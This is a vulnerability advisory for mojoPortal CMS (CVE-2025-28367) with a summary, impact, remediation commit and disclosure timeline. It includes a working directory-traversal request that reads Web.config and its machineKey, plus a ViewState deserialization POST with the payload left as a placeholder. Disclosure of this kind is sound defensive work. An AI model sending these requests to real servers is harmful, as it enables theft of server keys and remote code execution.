Advisory: mojoPortal CMS - Unauthenticated Remote Code Execution via Directory Traversal & ViewState Deserialization (CVE-2025-28367)

Summary

A directory traversal vulnerability leading to ViewState deserialization was identified in mojoPortal CMS version <=2.9.0.1. By leveraging this issue, an unauthenticated attacker can disclose sensitive files within the web root directory, including the application’s Web.config file. This configuration file contains the machineKey used to validate and decrypt ViewState data. With knowledge of this key, a cyber adversary can craft a malicious ViewState payload leading to remote code execution (RCE) on the underlying server.

Impact

By chaining the directory traversal and ViewState deserialization vulnerability, an unauthenticated cyber adversary has the ability to achieve full remote code execution (RCE) on the hosting web server. The attacker can download the Web.config file to extract the machineKey value, then send a malicious ViewState payload to a vulnerable endpoint to execute arbitrary commands within the context of the IIS worker process.

Affected Software Version

The vulnerability was confirmed on version 2.9.0.1, however previous versions may be affected.

Product Description

mojoPortal is an extensible, cross database, mobile friendly, web content management system (CMS) and web application framework written in C# ASP.NET.

Remediation

This issue was addressed in commit 8f8ce6a, however the applied fix has not been validated.

Vulnerability

Directory Traversal

GET /api/BetterImageGallery/imagehandler?path=../../../../Web.Config HTTP/1.1
Host: mojoPortal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

ViewState Deserialization

POST /Services/PayPalIPNHandler.aspx HTTP/1.1
Host: mojoPortal
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=<PAYLOAD_HERE>&__VIEWSTATEGENERATOR=9AF84319&txn_id=TESTTRANSACTION123&custom=aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee&mc_gross=100.00&payment_status=Completed

Exploit

The exploit script can be found here.

Credit

Jake McCallum (@0xLanks)

Disclosure Timeline

• 15th February 2025: Vulnerabilities discovered.
• 15th February 2025: Disclosure of vulnerabilities to i7MEDIA.
• 17th February 2025: CVE ID requested.
• 19th February 2025: Contact made by i7MEDIA. Fixes implemented and committed to master branch.
• 11th April 2025: CVE ID assigned.
• 13th April 2025: Advisory released.